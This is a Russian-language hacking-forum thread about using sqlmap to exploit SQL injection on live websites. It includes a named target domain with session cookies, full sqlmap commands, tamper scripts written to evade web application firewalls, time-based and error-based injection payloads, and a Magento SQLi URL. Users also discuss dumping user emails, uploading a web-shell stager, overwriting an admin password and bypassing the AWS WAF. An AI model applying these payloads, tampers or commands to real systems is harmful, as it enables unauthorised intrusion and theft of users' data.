The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]

Discovered by SQL injection

Attack Details
arrow_drop_up
POST (multipart) input REGISTER[EMAIL] was set to 1'"

Error message found:
You have an error in your SQL syntax



Code:
POST /cabinet/registration/?backurl=/cabinet/&register=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
Referer: https://aachibilyaev.com/
Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUE ST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A 00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITR IX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPI RE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversi on_visit_day%22%5D%7D;catalogViewMode=list;_ym_deb ug=null;last_visit=1591170065298::1591180865298;to p100_id=t1.6912325.390564327.1591180865288
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1021
Host: aachibilyaev.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"

g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[EMAIL]"

1'"
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[LOGIN]"

1
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[NAME]"

TWSfSopc
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PASSWORD]"

g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"

555-666-0606
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="backurl"

/cabinet/
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="licenses_popup"

Y
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button"

reg
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button1"

register_submit_button1=Регистрация
------------Q9OXvYdJGy9b--

Axiles said:
↑ (https://antichat.live/posts/4391858/)
Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо
http://prntscr.com/st216j

Code:
The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]

Discovered by SQL injection

Attack Details
arrow_drop_up
POST (multipart) input REGISTER[EMAIL] was set to 1'"

Error message found:
You have an error in your SQL syntax


Code:
POST /cabinet/registration/?backurl=/cabinet/&register=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
Referer: https://aachibilyaev.com/
Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUE ST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A 00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITR IX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPI RE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversi on_visit_day%22%5D%7D;catalogViewMode=list;_ym_deb ug=null;last_visit=1591170065298::1591180865298;to p100_id=t1.6912325.390564327.1591180865288
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1021
Host: aachibilyaev.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"

g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[EMAIL]"

1'"
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[LOGIN]"

1
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[NAME]"

TWSfSopc
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PASSWORD]"

g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"

555-666-0606
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="backurl"

/cabinet/
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="licenses_popup"

Y
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button"

reg
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button1"

register_submit_button1=Регистрация
------------Q9OXvYdJGy9b--



sqlmap.py --url "https://aachibilyaev.com/cabinet/registration/?register=yes" --data="backurl=/cabinet/login/&registe

r_submit_button=reg&REGISTER[NAME]=asdasd&REGISTER=1*&REGISTER[PERSONAL_PHONE]=+7 (123) 123-12-31&REGISTER[PASSWORD]=1234567&REGISTER[CONFIRM_PASSWORD]=1234567&REGI

STER[LOGIN]=1&licenses_popup=Y&register_submit_button1=Регистрация" --dbs --risk=3 --level=3 --dbms=mysql

p.s там фильтрация

karkajoi said:
↑ (https://antichat.live/posts/4391866/)
sqlmap.py --url "
https://aachibilyaev.com/cabinet/registration/?register=yes
" --data="backurl=/cabinet/login/&registe
r_submit_button=reg&REGISTER[NAME]=asdasd&REGISTER=1*&REGISTER[PERSONAL_PHONE]=+7 (123) 123-12-31&REGISTER[PASSWORD]=1234567&REGISTER[CONFIRM_PASSWORD]=1234567&REGI
STER[LOGIN]=1&licenses_popup=Y&register_submit_button1=Регистрация" --dbs --risk=3 --level=3 --dbms=mysql
p.s там фильтрация


это через burp? спасибо

Axiles said:
↑ (https://antichat.live/posts/4391867/)
это через burp? спасибо


это так в мапу уже пихать

Помогите с тампером для мапы, нужно что б слово from меняло на 'xz'froM

karkajoi said:
↑ (https://antichat.live/posts/4391895/)
Помогите с тампером для мапы, нужно что б слово from меняло на 'xz'froM


я бы взял как болванку тампер

.SpoilerTarget" type="button">Spoiler: equaltolike.py


Code:
#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))

def tamper(payload, **kwargs):
"""
Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5

Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databases

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
"""

retVal = payload

if payload:
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)

return retVal


теперь в регулярке (https://docs.python.org/3/library/re.html#re.sub) пишите


Code:
retVal = re.sub(r"\s*FROM\s*", " \'xz\'froM ", retVal, flags=re.IGNORECASE)

и сохраняете под другим именем.

Парни как понять какую технику нужно использовать? --technique

Axiles said:
↑ (https://antichat.live/posts/4392365/)
Парни как понять какую технику нужно использовать? --technique


Всё просто, вот варианты:


Code:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

Использовать так:


Code:
--technique=BE

А вообще эти моменты расписаны все в sqlmap wiki usage на github'e (https://github.com/sqlmapproject/sqlmap/wiki/Usage)

Там все ключи всё расписано

PS: а как понять, так просто голова+руки

К примеру что бы сэкономить время не хочешь проверять на Time-based blind, то --technique=BEUSQ

или наоборот если слепая то --technique=T

Надеюсь мысль понял) (PS сорри что квадратно объяснил, на англ проще)

кто сталкивался с таким? http://prntscr.com/svuovq

уязвимость типа boolean-based blind

открывается бд ,но не полностью ,открывает часть таблицы,а дальше вот это

[14:29:22] [INFO] retrieving the length of query output

[14:29:22] [INFO] retrieved:

[14:29:26] [INFO] retrieved:

[14:29:30] [INFO] retrieving the length of query output

[14:29:30] [INFO] retrieved:

[14:29:33] [INFO] retrieved:

[14:29:36] [INFO] retrieving the length of query output

[14:29:36] [INFO] retrieved:

[14:29:40] [INFO] retrieved:

[14:29:44] [INFO] retrieving the length of query output

[14:29:44] [INFO] retrieved:

[14:29:47] [INFO] retrieved:

[14:29:50] [INFO] retrieving the length of query output

[14:29:50] [INFO] retrieved:

[14:29:53] [INFO] retrieved:

[14:29:57] [INFO] retrieving the length of query output

[14:29:57] [INFO] retrieved:

[14:30:00] [INFO] retrieved:

[14:30:04] [INFO] retrieving the length of query output

[14:30:04] [INFO] retrieved:

[14:30:07] [INFO] retrieved:

[14:30:11] [INFO] retrieving the length of query output

[14:30:11] [INFO] retrieved:

Axiles said:
↑ (https://antichat.live/posts/4392773/)
кто сталкивался с таким?
http://prntscr.com/svuovq
уязвимость типа boolean-based blind
открывается бд ,но не полностью ,открывает часть таблицы,а дальше вот это
[14:29:22] [INFO] retrieving the length of query output
[14:29:22] [INFO] retrieved:
[14:29:26] [INFO] retrieved:
[14:29:30] [INFO] retrieving the length of query output
[14:29:30] [INFO] retrieved:
[14:29:33] [INFO] retrieved:
[14:29:36] [INFO] retrieving the length of query output
[14:29:36] [INFO] retrieved:
[14:29:40] [INFO] retrieved:
[14:29:44] [INFO] retrieving the length of query output
[14:29:44] [INFO] retrieved:
[14:29:47] [INFO] retrieved:
[14:29:50] [INFO] retrieving the length of query output
[14:29:50] [INFO] retrieved:
[14:29:53] [INFO] retrieved:
[14:29:57] [INFO] retrieving the length of query output
[14:29:57] [INFO] retrieved:
[14:30:00] [INFO] retrieved:
[14:30:04] [INFO] retrieving the length of query output
[14:30:04] [INFO] retrieved:
[14:30:07] [INFO] retrieved:
[14:30:11] [INFO] retrieving the length of query output
[14:30:11] [INFO] retrieved:


Попробуй с --hex

Уязвимость в заголовке


Code:
Origin: -1;select pg_sleep(0); --

Как правильно вставить в sqlmap?

--headers="Origin:*" не прокатывает

подскажите сливает в таком формате

***te89@gmail.co.uk

***slav.stojanov@outlook.com

***eneellis73@gmail.com

***chan@yahoo.com

из за чего так?

надо ставить оригинальный параметр. ты ставишь или пустой или уже разкрученый параметр да и в целом надо проверять ручками есть ли вообще то там дырка.

Parameter: #1* (URI)

Type: boolean-based blind

Title: Boolean-based blind - Parameter replace (original value)

Type: error-based

Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

[04:43:21] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0

[04:43:21] [INFO] testing if current user is DBA

[04:43:21] [INFO] fetching current user

[04:43:22] [INFO] retrieved: 'root@localhost'

current user is DBA: True

не возможно залить шелл

[04:44:04] [WARNING] unable to upload the file stager on '/var/www/'

[04:44:04] [INFO] trying to upload the file stager on '/var/www/menu/-1/' via LIMIT 'LINES TERMINATED BY' method

Не получается ничего.

[04:45:04] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0

[04:45:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell>

[04:00:51] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

Подскажите пожалуйста что можно сделать ???

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://site.com:80/Help/HelpIndex.html?HelpName=Earn money&ThemeID=17 AND 2864=2864

---

[16:58:45] [INFO] testing MySQL

[16:58:45] [WARNING] the back-end DBMS is not MySQL

[16:58:45] [INFO] testing Oracle

[16:58:45] [WARNING] the back-end DBMS is not Oracle

[16:58:45] [INFO] testing PostgreSQL

[16:58:45] [WARNING] the back-end DBMS is not PostgreSQL

[16:58:45] [INFO] testing Microsoft SQL Server

[16:58:45] [WARNING] the back-end DBMS is not Microsoft SQL Server

[16:58:45] [INFO] testing SQLite

[16:58:45] [WARNING] the back-end DBMS is not SQLite

[16:58:45] [INFO] testing Microsoft Access

[16:58:45] [WARNING] the back-end DBMS is not Microsoft Access

[16:58:45] [INFO] testing Firebird

[16:58:45] [WARNING] the back-end DBMS is not Firebird

[16:58:45] [INFO] testing SAP MaxDB

[16:58:45] [WARNING] the back-end DBMS is not SAP MaxDB

[16:58:45] [INFO] testing Sybase

[16:58:45] [WARNING] the back-end DBMS is not Sybase

[16:58:45] [INFO] testing IBM DB2

[16:58:45] [WARNING] the back-end DBMS is not IBM DB2

[16:58:45] [INFO] testing HSQLDB

[16:58:45] [WARNING] the back-end DBMS is not HSQLDB

[16:58:45] [INFO] testing H2

[16:58:45] [WARNING] the back-end DBMS is not H2

[16:58:45] [INFO] testing Informix

[16:58:45] [WARNING] the back-end DBMS is not Informix

[16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

ending @ 16:58:45 /2020-06-28/

Кто сталкивался? В чем проблема?

Duble said:
↑ (https://antichat.live/posts/4396828/)
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
http://site.com:80/Help/HelpIndex.html?HelpName=Earn
money&ThemeID=17 AND 2864=2864
---
[16:58:45] [INFO] testing MySQL
[16:58:45] [WARNING] the back-end DBMS is not MySQL
....
[16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
ending @ 16:58:45 /2020-06-28/
Кто сталкивался? В чем проблема?


На соседнем борде обсуждали что типа одна скуля не отдает DBMS а вторая может и отдать.. Ищи еще скули на сайте

Так же грешат на WAF и предполагают что тип уязвимости - NoSQL Потому и не может определить dbms

Взаимодействие sqlmap и metasploit - что не так?

Дампит нормально а коннект отказывается создавать , все пути прописаны правильно...

Гугл поиск по запросу "unable to prompt for an out-of-band session" ничего не выдал вразумительного ..

Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию.

Ссылка get https://www.example.com/example.php?langid=test&Product=1. уязвимый параметр "langid". Есть готовый пэйлоад со сканера.

-1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count (*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64) %2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2c CHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x 3a%2cfloor(rand()*2))x+from+(select+1+union+select +2)a+group+by+x+limit+1))--+1

каким образом можно его указать или подтолкнуть?Кроме --technique=

Есть кто сталкивался и решал такое?

sosidzh24 said:
↑ (https://antichat.live/posts/4410156/)
Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию.
Ссылка get
https://www.example.com/example.php?langid=test&Product=1
. уязвимый параметр "langid". Есть готовый пэйлоад со сканера.
-1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count (*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64) %2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2c CHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x 3a%2cfloor(rand()*2))x+from+(select+1+union+select +2)a+group+by+x+limit+1))--+1
каким образом можно его указать или подтолкнуть?Кроме --technique=
Есть кто сталкивался и решал такое?


Сам уязвимый параметр можно укозать *, ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой.

[QUOTE = "winstrool, post: 4410186, member: 33917"] Сам уязвимый параметр можно укозать * , ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой. [/ QUOTE]

Видел пост на кодебу, как ребята вставляют пейлоады через preffix и suffix.Но до конца не разобрался

Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.

https://a.radikal.ru/a06/2009/3c/fbc9ebc1b33f.png

polzunki said:
↑ (https://antichat.live/posts/4411920/)
Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.
https://a.radikal.ru/a06/2009/3c/fbc9ebc1b33f.png


Если нет information_schema то sqlmap предлагает брутить таблицы/столбцы. Только так

Octavian said:
↑ (https://antichat.live/posts/4411924/)
Если нет information_schema то sqlmap предлагает брутить таблицы/столбцы. Только так


ну таблицы можно угодать, как и колонки

polzunki said:
↑ (https://antichat.live/posts/4411920/)
Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.
https://a.radikal.ru/a06/2009/3c/fbc9ebc1b33f.png


Ну судя по скрину, у вас есть уязвимость в УРЛе, а дальше:


на сервере стоит очень маленький параметр LimitRequestLine (http://httpd.apache.org/docs/2.4/mod/core.html#limitrequestline) или же large_client_header_buffers (http://nginx.org/en/docs/http/ngx_http_core_module.html#large_client_header_buff ers)

Или же у вас оооооочень длинные запросы

Ну или же стоит какая-либо WAF, которая вместо 404 отдаёт ошибку 414 (что вряд-ли)
Так что сначала выясните какую максимальную длину поддерживает сервер, банально с помощью bash:


Code:
baseurl="http://site.com/"; for i in {1..1000}; do baseurl=$baseurl'A'; length=$(echo -n "$baseurl"|wc -c); response=$(curl -I -s "$baseurl" | grep "HTTP\/" | cut -d " " -f 2); echo "Length:$length Response-Code: $response URL: $baseurl"; done

Затем пропустите трафик через свой прокси (burp, charlie..) и посмотрите что идёт от скульмапа


Code:
sqlmap --proxy /

ну и там уже по обстоятельствам.

Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку

.SpoilerTarget" type="button">Spoiler: Лог
The vulnerability affects https://www.site.com/ , //// /.html

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

Path Fragment input //// /.html was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Tests performed:


0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737


Original value: Sneaker

HTTP Request

arrow_drop_up

GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://www.site.com/

Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: www.site.com (http://www.site.com)

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive

Gutman999 said:
↑ (https://antichat.live/posts/4417062/)
Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку
Spoiler: Лог
The vulnerability affects
https://www.site.com/ , //// /.html
Discovered by
Blind SQL Injection
Attack Details
arrow_drop_up
Path Fragment input
//// /.html
was set to
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737

Original value:
Sneaker

HTTP Request
arrow_drop_up
GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer:
https://www.site.com/
Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host:
www.site.com (http://www.site.com)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive


Если есть rce зачем иньекция?

karkajoi said:
↑ (https://antichat.live/posts/4417137/)
Если есть rce зачем иньекция?


Не совсем понял тебя друже. Ты имеешь ввиду php code injection? Я с этим не знаком

Gutman999 said:
↑ (https://antichat.live/posts/4417149/)
Не совсем понял тебя друже. Ты имеешь ввиду php code injection? Я с этим не знаком


Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал

karkajoi said:
↑ (https://antichat.live/posts/4417163/)
Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал


А как эту уязвимость реализовать не подскажешь? Мана нету случайно?

Gutman999 said:
↑ (https://antichat.live/posts/4417211/)
А как эту уязвимость реализовать не подскажешь? Мана нету случайно?


https://github.com/sqlmapproject/sqlmap/wiki/Usage

--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.

Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = 'admin@admin.com (mailto:admin@admin.com)';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?

sosidzh24 said:
↑ (https://antichat.live/posts/4419505/)
--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.
Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = '
admin@admin.com (mailto:admin@admin.com)
';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?


PHP не поддерживает стек запросов, когда СУБД является MySQL

как обойти WAF/IPS identified as 'AWS WAF (Amazon)'

Array

(

[0] => Array

(

[0] => 42000

[SQLSTATE] => 42000

[1] => 8114


Code:
=> 8114
[2] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
[message] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
)

)

Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability

нашел видос и пару статей как раскрутить

вот к примеру

но ничего не выходт

вот как выглядит

https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3 (https://site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3)>8)+--+-

или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости

Gigggs said:
↑ (https://antichat.live/posts/4427095/)
Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability
нашел видос и пару статей как раскрутить
вот к примеру
но ничего не выходт
вот как выглядит
https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3 (https://site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3)
>8)+--+-
или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости


Гадать на кофейной гуще?

Что вам говорит site/magento_version

Что получаете в ответ когда шлёте


Code:
)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1= 1)+--+-

и что получаете


Code:
)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1= 0)+--+-

Первоисточник (https://www.ambionics.io/blog/magento-sqli)

Привет помогите!

Через SQLmap в PostgreSQL создал --sql-shell как мне сохранить output запросов?

SQLmap стандартным способом сохраняет но через --dump мне не выдает ничего только через sql-shell

подскажите , че это такое?

available databases [7]:

`\\xfc@\xdc\xff\xfbt\xb7?\xfd\xff\xff\xa0? "@>@?\xf1W\x8f\xa0#\xff\x90@\xf2?\xfe\xe8\xff\xc8\xf9 \xf9\xe4c\xfa;7:\xbc\x80\xeb\x83\xf`

`\xfc\xff\xc8\xf3\xfc\xa0\xe3\xe4\xd0?\xff\xc8\xff \x84>1\xe2\x909\xfc

\xfe?\xca\xd8+\xf0V`

`\xfc \xc8\xfcD\x81▒\xff\xe8\xff\xf8\xff \x85 \xc4\xff\x9f\xfa\xf3\xf1NH\xe3\xe2\xb9 \xa2\xe1

\x801\xfb\xa0`

`\xfc \xff\xff\xfa\xbf\xc8?\x8f ? ?\xff\xfa$8\xff\xfb?\xff\xe4\xff\xff\xfe1 \xff\xfc\xe1G\xf9^\xe0\xffq\xc1`

Gigggs said:
↑ (https://antichat.live/posts/4428419/)
подскажите , че это такое?
available databases [7]:
`\\xfc@\xdc\xff\xfbt\xb7?\xfd\xff\xff\xa0? "@>@?\xf1W\x8f\xa0#\xff\x90@\xf2?\xfe\xe8\xff\xc8\xf9 \xf9\xe4c\xfa;7:\xbc\x80\xeb\x83\xf`
`\xfc\xff\xc8\xf3\xfc\xa0\xe3\xe4\xd0?\xff\xc8\xff \x84>1\xe2\x909\xfc
\xfe?\xca\xd8+\xf0V`
`\xfc \xc8\xfcD\x81▒\xff\xe8\xff\xf8\xff \x85 \xc4\xff\x9f\xfa\xf3\xf1NH\xe3\xe2\xb9 \xa2\xe1
\x801\xfb\xa0`
`\xfc \xff\xff\xfa\xbf\xc8?\x8f ? ?\xff\xfa$8\xff\xfb?\xff\xe4\xff\xff\xfe1 \xff\xfc\xe1G\xf9^\xe0\xffq\xc1`


Насколько я понимаю, это звания баз данных в неправильной кодировке (https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_character_set_database).

Можете посмотреть используемую кодировку с помощью


Code:
SELECT SCHEMA_NAME 'database', default_character_set_name 'charset', DEFAULT_COLLATION_NAME 'collation' FROM information_schema.SCHEMATA;

Приветствую. Русские слова/буквы дампятся из БД в таком виде: вапми

Английские слова и буквы при этом в нормальном виде. Кто то может подсказать как сдампить данные на русском языке в нормальном виде?

Добрый день

куда копать дальше?

������ ���������� ������� SELECT * FROM `m_services` WHERE pay = ''' AND id_device='0' AND type!='provider' AND active='1' ORDER BY id

как из boolean-based blind (false positive) сделать union, указать количество колонок (--union-cols=) в current bd или во всех БД?

brown said:
↑ (https://antichat.live/posts/4434179/)
как из boolean-based blind (false positive) сделать union, указать количество колонок (--union-cols=) в current bd или во всех БД?


Что-то мне не понятна суть вопроса, во первых "false positive" вроде как говорит о том что там вовсе и нету скули? К тому же даже если у вас и есть скуля, то она же слепая (boolean-based blind) и что тогда вам даст данные из других таблиц через UNION?

fandor9 said:
↑ (https://antichat.live/posts/4434348/)
Что-то мне не понятна суть вопроса, во первых "false positive" вроде как говорит о том что там вовсе и нету скули? К тому же даже если у вас и есть скуля, то она же слепая (boolean-based blind) и что тогда вам даст данные из других таблиц через UNION?


я имею в виду как мапу помочь крутануть вектор юнион?

target URL appears to have 47 columns in query

brown said:
↑ (https://antichat.live/posts/4434457/)
я имею в виду как мапу помочь крутануть вектор юнион?
target URL appears to have 47 columns in query


--technique=U

подскажите что написать в коде темпера для того чтоб он при запросах менял select на %53%45%4c%45%43%54

я попробовал сделать вот так:


Code:
#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
pass

def tamper(payload, **kwargs):
"""
Reference:

Notes:
Examples:
"""

retVal = payload

if payload:
retVal = re.sub(r"\s*SELECT\s*", " %53%45%4c%45%43%54 ", retVal)

return retVal

но при запуске он мне пишет [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script

